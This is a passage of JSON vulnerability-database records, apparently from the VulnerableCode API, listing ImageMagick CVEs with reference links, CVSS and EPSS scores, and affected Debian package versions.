"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1557", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1557" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801674", "reference_id": "1801674", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801674" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16712", "reference_id": "CVE-2019-16712", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:N/I:N/A:P" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16712" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-16712" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zh44-pz7k-abba" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80560?format=api", "vulnerability_id": "VCID-zp6q-98qj-ykh1", "summary": "ImagemMagick: Division by zero in WaveImage() of MagickCore/visual-effects.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20309.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20309.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20309", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.4701", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47047", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47066", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47014", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47069", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47065", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47089", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47063", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47126", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47121", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47055", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20309" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946722", "reference_id": "1946722", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946722" }, { "reference_url": "https://usn.ubuntu.com/5158-1/", "reference_id": "USN-5158-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5158-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20309" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zp6q-98qj-ykh1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81954?format=api", "vulnerability_id": "VCID-zv8w-puzj-23cd", "summary": "ImageMagick: outside the range of representable values of type int and signed integer overflow in MagickCore/histogram.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25666.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": 